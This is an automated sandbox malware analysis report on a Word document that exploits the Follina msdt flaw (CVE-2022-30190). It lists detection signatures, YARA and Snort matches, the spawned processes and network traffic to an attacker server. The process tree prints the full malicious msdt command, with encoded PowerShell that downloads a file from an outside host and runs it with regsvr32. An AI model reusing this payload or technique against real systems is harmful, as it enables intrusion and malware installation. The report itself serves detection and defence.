
Windows Analysis Report
doc1712.docx

Overview

General Information

Sample Name: doc1712.docx
Analysis ID: 640804
MD5: 7a91b01a037ccbfe6589161643d0a65a
SHA1: 53658a5b5bc577d601e23ae77a34cb44dcba1f27
SHA256: f17f5c8eac3a18c961705a61385e1d2894cc8f22fb33aa3e076a40b826384c60

Detection

Follina CVE-2022-30190
Score: 72
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected Microsoft Office Exploit Follina CVE-2022-30190
Snort IDS alert for network traffic
Contains an external reference to another file
Document exploit detected (process start blacklist hit)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
PE file does not import any functions
Queries the volume information (name, serial number etc) of a device
Yara signature match
Potential document exploit detected (unknown TCP traffic)
PE file contains strange resources
Drops PE files
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Drops PE files to the windows directory (C:\Windows)
Internet Provider seen in connection with other malware
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Compiles C# or VB.Net code
Found dropped PE file which has not been started or loaded
Potential document exploit detected (performs HTTP gets)
Creates a process in suspended mode (likely to inject code)

Classification

  • System is w10x64
  • WINWORD.EXE (PID: 7032 cmdline: "C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE" /Automation -Embedding MD5: 0B9AB9B9C4DE429473D6450D4297A123)
    • MSOSYNC.EXE (PID: 5184 cmdline: C:\Program Files (x86)\Microsoft Office\Office16\MsoSync.exe MD5: EA19F4A0D18162BE3A0C8DAD249ADE8C)
    • MSOSYNC.EXE (PID: 6040 cmdline: C:\Program Files (x86)\Microsoft Office\Office16\MsoSync.exe MD5: EA19F4A0D18162BE3A0C8DAD249ADE8C)
    • msdt.exe (PID: 6552 cmdline: C:\Windows\system32\msdt.exe" ms-msdt:/id PCWDiagnostic /skip force /param "IT_RebrowseForFile=? IT_LaunchMethod=ContextMenu IT_BrowseForFile=$(Invoke-Expression($(Invoke-Expression('[System.Text.Encoding]'+[char]58+[char]58+'Unicode.GetString([System.Convert]'+[char]58+[char]58+'FromBase64String('+[char]34+'JABwACAAPQAgACQARQBuAHYAOgB0AGUAbQBwADsAaQB3AHIAIABoAHQAdABwAHMAOgAvAC8AYQBsAHMALQBvAG4AbABpAG4AZQAuAG8AcgBnAC8ASgBRAFcAagA3ADgALwBZAC4AcABuAGcAIAAtAE8AdQB0AEYAaQBsAGUAIAAkAHAAXABGAHIAbwBzAC4AcABvAHMAdABlAHIAOwByAGUAZwBzAHYAcgAzADIAIAAkAHAAXABGAHIAbwBzAC4AcABvAHMAdABlAHIA'+[char]34+'))'))))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe MD5: 7F0C51DBA69B9DE5DDF6AA04CE3A69F4)
  • csc.exe (PID: 6332 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\qe5jzpda\qe5jzpda.cmdline MD5: 350C52F71BDED7B99668585C15D70EEA)
    • cvtres.exe (PID: 5056 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES374A.tmp" "c:\Users\user\AppData\Local\Temp\qe5jzpda\CSC4563D2ED18334995B732DDC516AA1E81.TMP" MD5: C09985AE74F0882F208D75DE27770DFA)
  • csc.exe (PID: 5160 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\xwo13jpt\xwo13jpt.cmdline MD5: 350C52F71BDED7B99668585C15D70EEA)
    • cvtres.exe (PID: 5412 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES4C97.tmp" "c:\Users\user\AppData\Local\Temp\xwo13jpt\CSC9D13466D68BE46EAAB5DAAD8B4EDFE4C.TMP" MD5: C09985AE74F0882F208D75DE27770DFA)
  • regsvr32.exe (PID: 6868 cmdline: "C:\Windows\system32\regsvr32.exe" C:\Users\user\AppData\Local\Temp\Fros.poster MD5: 426E7499F6A7346F0410DEAD0805586B)
  • csc.exe (PID: 1500 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ddzr0cba\ddzr0cba.cmdline MD5: 350C52F71BDED7B99668585C15D70EEA)
    • cvtres.exe (PID: 6880 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESB3CD.tmp" "c:\Users\user\AppData\Local\Temp\ddzr0cba\CSC44E4BCADDF3245FBA3B96135AF703040.TMP" MD5: C09985AE74F0882F208D75DE27770DFA)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
dump.pcap | JoeSecurity_Follina | Yara detected Microsoft Office Exploit Follina / CVE-2022-30190 | Joe Security
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PEJLKQA8\123[1].RES | MAL_Msdt_MSProtocolURI_May22 | Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 | Tobias Michalski, Christian Burkard
  • 0x1447:$re1: location.href = "ms-msdt:
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PEJLKQA8\123[1].RES | JoeSecurity_Follina | Yara detected Microsoft Office Exploit Follina / CVE-2022-30190 | Joe Security
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\1FD46902.htm | MAL_Msdt_MSProtocolURI_May22 | Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 | Tobias Michalski, Christian Burkard
  • 0x1447:$re1: location.href = "ms-msdt:
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\1FD46902.htm | JoeSecurity_Follina | Yara detected Microsoft Office Exploit Follina / CVE-2022-30190 | Joe Security
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\7F7F7060.htm | MAL_Msdt_MSProtocolURI_May22 | Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 | Tobias Michalski, Christian Burkard
  • 0x1447:$re1: location.href = "ms-msdt:
00000009.00000002.729808859.0000000002830000.00000004.00000020.00020000.00000000.sdmp | SUSP_PS1_Msdt_Execution_May22 | Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 | Nasreddine Bencherchali, Christian Burkard
        • 0x1ccc:$sa1: msdt.exe
        • 0x1d08:$sa1: msdt.exe
        • 0x2252:$sa1: msdt.exe
        • 0x39cd:$sa1: msdt.exe
        • 0x1dda:$sb2: IT_BrowseForFile=
        • 0x3a36:$sb2: IT_BrowseForFile=
00000009.00000002.729847278.0000000002838000.00000004.00000020.00020000.00000000.sdmp | SUSP_PS1_Msdt_Execution_May22 | Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 | Nasreddine Bencherchali, Christian Burkard
        • 0x40ec:$sa1: msdt.exe
        • 0x5388:$sa1: msdt.exe
        • 0x18cb6:$sa1: msdt.exe
        • 0x26bfa:$sb2: IT_BrowseForFile=
00000009.00000002.729643897.00000000026B0000.00000004.00000020.00020000.00000000.sdmp | SUSP_PS1_Msdt_Execution_May22 | Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 | Nasreddine Bencherchali, Christian Burkard
        • 0x2320:$sa1: msdt.exe
        • 0x235c:$sa1: msdt.exe
        • 0x28a6:$sa1: msdt.exe
        • 0x242e:$sb2: IT_BrowseForFile=
00000009.00000002.730773001.0000000002AB0000.00000004.00000020.00020000.00000000.sdmp | SUSP_PS1_Msdt_Execution_May22 | Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 | Nasreddine Bencherchali, Christian Burkard
        • 0x28c8:$sa1: msdt.exe
        • 0x2996:$sb2: IT_BrowseForFile=
Process Memory Space: msdt.exe PID: 6552 | SUSP_PS1_Msdt_Execution_May22 | Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 | Nasreddine Bencherchali, Christian Burkard
        • 0x5de0:$sa1: msdt.exe
        • 0x5eef:$sa1: msdt.exe
        • 0x7adf:$sa1: msdt.exe
        • 0xb6fc:$sa1: msdt.exe
        • 0xe6b2:$sa1: msdt.exe
        • 0x1159c:$sa1: msdt.exe
        • 0x1704c:$sa1: msdt.exe
        • 0x1a002:$sa1: msdt.exe
        • 0x20479:$sa1: msdt.exe
        • 0x2342f:$sa1: msdt.exe
        • 0x2dfc5:$sa1: msdt.exe
        • 0x30f7b:$sa1: msdt.exe
        • 0x39bc5:$sa1: msdt.exe
        • 0x42747:$sa1: msdt.exe
        • 0x47119:$sa1: msdt.exe
        • 0x4a0cf:$sa1: msdt.exe
        • 0x4d745:$sa1: msdt.exe
        • 0x4e858:$sa1: msdt.exe
        • 0x4e860:$sa1: msdt.exe
        • 0x4e868:$sa1: msdt.exe
        • 0x4fa44:$sa1: msdt.exe
        No Sigma rule has matched
Timestamp: 06/07/22-17:33:41.296228
Source IP: 45.32.185.177
Destination IP: 192.168.2.22
Source Port: 80
Destination Port: 49176
Protocol: TCP
SID: 2036726
Classtype: Attempted User Privilege Gain


        AV Detection

Source: doc1712.docx | Virustotal: Detection: 23%

        Exploits

Source: Yara match | File source: dump.pcap, type: PCAP
Source: Yara match | File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PEJLKQA8\123[1].RES, type: DROPPED
Source: Yara match | File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\1FD46902.htm, type: DROPPED
Source: Yara match | File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\7F7F7060.htm, type: DROPPED
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE | File opened: C:\Windows\SysWOW64\MSVCR100.dll

        Software Vulnerabilities

Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE | Process created: C:\Windows\SysWOW64\msdt.exe
Source: global traffic | TCP traffic: 192.168.2.5:49754 -> 45.32.185.177:80
Source: global traffic | TCP traffic: 192.168.2.5:49765 -> 45.32.185.177:80

        Networking

Source: Traffic | Snort IDS: 2036726 ET EXPLOIT Possible Microsoft Support Diagnostic Tool Exploitation Inbound (CVE-2022-30190) 45.32.185.177:80 -> 192.168.2.22:49176
Source: global traffic | HTTP traffic detected:
GET /123.RES HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; ms-office; MSOffice 16)
Accept-Encoding: gzip, deflate
Host: 45.32.185.177
Connection: Keep-Alive
Source: global traffic | HTTP traffic detected:
GET /123.RES HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; ms-office; MSOffice 16)
Accept-Encoding: gzip, deflate
Host: 45.32.185.177
If-Modified-Since: Tue, 07 Jun 2022 13:20:09 GMT
If-None-Match: "1701-5e0db72a43821"
Connection: Keep-Alive
Source: Joe Sandbox View | ASN Name: AS-CHOOPAUS AS-CHOOPAUS
Source: unknown | TCP traffic detected without corresponding DNS query: 45.32.185.177 (38 identical entries in the original report)
Source: ~WRS{99114F2D-2DF9-4F1D-B87F-44944CA06DB2}.tmp.0.dr | String found in binary or memory: http://45.32.185.177:80/123.RES
Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr | String found in binary or memory: http://b.c2r.ts.cdn.office.net/pr
Source: msdt.exe, 00000009.00000002.730185896.00000000028C0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr | String found in binary or memory: http://f.c2r.ts.cdn.office.net/pr
Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr | String found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr | String found in binary or memory: http://weather.service.msn.com/data.aspx
Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr | String found in binary or memory: https://addinsinstallation.store.office.com/app/acquisitionlogging
Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr | String found in binary or memory: https://addinsinstallation.store.office.com/app/download
Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr | String found in binary or memory: https://addinsinstallation.store.office.com/appinstall/authenticated
Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr | String found in binary or memory: https://addinsinstallation.store.office.com/appinstall/preinstalled
Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr | String found in binary or memory: https://addinsinstallation.store.office.com/appinstall/unauthenticated
Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr | String found in binary or memory: https://addinsinstallation.store.office.com/orgid/appinstall/authenticated
Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr | String found in binary or memory: https://addinslicensing.store.office.com/apps/remove
Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr | String found in binary or memory: https://addinslicensing.store.office.com/commerce/query
Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr | String found in binary or memory: https://addinslicensing.store.office.com/entitlement/query
Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr | String found in binary or memory: https://addinslicensing.store.office.com/orgid/apps/remove
Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr | String found in binary or memory: https://addinslicensing.store.office.com/orgid/entitlement/query
Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr | String found in binary or memory: https://analysis.windows.net/powerbi/api
Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr | String found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr | String found in binary or memory: https://api.aadrm.com
Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr | String found in binary or memory: https://api.aadrm.com/
Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr | String found in binary or memory: https://api.addins.omex.office.net/appinfo/query
Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr | String found in binary or memory: https://api.addins.omex.office.net/appstate/query
Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr | String found in binary or memory: https://api.addins.store.office.com/addinstemplate
Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr | String found in binary or memory: https://api.addins.store.office.com/app/query
Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr | String found in binary or memory: https://api.addins.store.officeppe.com/addinstemplate
Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr | String found in binary or memory: https://api.cortana.ai
Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr | String found in binary or memory: https://api.diagnostics.office.com
Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr | String found in binary or memory: https://api.diagnosticssdf.office.com
Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr | String found in binary or memory: https://api.diagnosticssdf.office.com/v2/feedback
Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr | String found in binary or memory: https://api.diagnosticssdf.office.com/v2/file
Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr | String found in binary or memory: https://api.microsoftstream.com/api/
Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr | String found in binary or memory: https://api.office.net
Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr | String found in binary or memory: https://api.onedrive.com
Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr | String found in binary or memory: https://api.powerbi.com/beta/myorg/imports
Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr | String found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets
Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr | String found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups
Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr | String found in binary or memory: https://apis.live.net/v5.0/
Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr | String found in binary or memory: https://arc.msn.com/v4/api/selection
Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr | String found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr | String found in binary or memory: https://augloop.office.com
Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr | String found in binary or memory: https://augloop.office.com/v2
Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr | String found in binary or memory: https://augloop.office.com;https://augloop-int.officeppe.com;https://augloop-dogfood.officeppe.com;h
Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr | String found in binary or memory: https://autodiscover-s.outlook.com/
Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr | String found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr | String found in binary or memory: https://cdn.entity.
Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr | String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr | String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr | String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr | String found in binary or memory: https://client-office365-tas.msedge.net/ab
Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr | String found in binary or memory: https://clients.config.office.net/
Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr | String found in binary or memory: https://clients.config.office.net/c2r/v1.0/InteractiveInstallation
Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr | String found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr | String found in binary or memory: https://clients.config.office.net/user/v1.0/ios
Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr | String found in binary or memory: https://clients.config.office.net/user/v1.0/mac
Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr | String found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr | String found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr | String found in binary or memory: https://config.edge.skype.com
Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr | String found in binary or memory: https://config.edge.skype.com/config/v1/Office
Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr | String found in binary or memory: https://config.edge.skype.com/config/v2/Office
Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr | String found in binary or memory: https://cortana.ai
Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr | String found in binary or memory: https://cortana.ai/api
Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr | String found in binary or memory: https://cr.office.com
Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr | String found in binary or memory: https://dataservice.o365filtering.com
Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr | String found in binary or memory: https://dataservice.o365filtering.com/
Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr | String found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr | String found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr | String found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr | String found in binary or memory: https://dev.cortana.ai
Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr | String found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr | String found in binary or memory: https://dev0-api.acompli.net/autodetect
Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr | String found in binary or memory: https://devnull.onenote.com
Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr | String found in binary or memory: https://directory.services.
Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr | String found in binary or memory: https://ecs.office.com/config/v2/Office
Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr | String found in binary or memory: https://edu-mathreco-prod.trafficmanager.net
Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr | String found in binary or memory: https://edu-mathsolver-prod.trafficmanager.net
Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr | String found in binary or memory: https://enrichment.osi.office.net/
Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr | String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Refresh/v1
Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr | String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Resolve/v1
Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr | String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Search/v1
Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr | String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/StockHistory/v1
Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr | String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/ipcheck/v1
Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr | String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/
Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr | String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/metadata.json
Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr | String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/view/desktop/main.cshtml
Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr | String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/view/web/main.cshtml
Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr | String found in binary or memory: https://entitlement.diagnostics.office.com
Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr | String found in binary or memory: https://entitlement.diagnosticssdf.office.com
Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr | String found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr | String found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr | String found in binary or memory: https://globaldisco.crm.dynamics.com
Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr | String found in binary or memory: https://graph.ppe.windows.net
Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr | String found in binary or memory: https://graph.ppe.windows.net/
Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr | String found in binary or memory: https://graph.windows.net
Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr | String found in binary or memory: https://graph.windows.net/
Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr | String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr | String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr | String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?secureurl=1
Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr | String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&premium=1
Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr | String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&premium=1
Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr | String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&premium=1
Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr | String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr | String found in binary or memory: https://incidents.diagnostics.office.com
Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr | String found in binary or memory: https://incidents.diagnosticssdf.office.com
Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr | String found in binary or memory: https://inclient.store.office.com/gyro/client
Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr | String found in binary or memory: https://inclient.store.office.com/gyro/clientstore
Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr | String found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive
Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr | String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr | String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr | String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr | String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr | String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr | String found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr | String found in binary or memory: https://invites.office.com/
Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr | String found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr | String found in binary or memory: https://lifecycle.office.com
Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr | String found in binary or memory: https://login.microsoftonline.com/
Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr | String found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr | String found in binary or memory: https://login.windows.local
Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr | String found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr | String found in binary or memory: https://login.windows.net/common/oauth2/authorize
Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr | String found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr | String found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr | String found in binary or memory: https://management.azure.com
Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr | String found in binary or memory: https://management.azure.com/
Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr | String found in binary or memory: https://messaging.engagement.office.com/
Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr | String found in binary or memory: https://messaging.engagement.office.com/campaignmetadataaggregator
Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr | String found in binary or memory: https://messaging.office.com/
Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr | String found in binary or memory: https://metadata.templates.cdn.office.net/client/log
Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr | String found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr | String found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr | String found in binary or memory: https://ncus.contentsync.
Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr | String found in binary or memory: https://ncus.pagecontentsync.
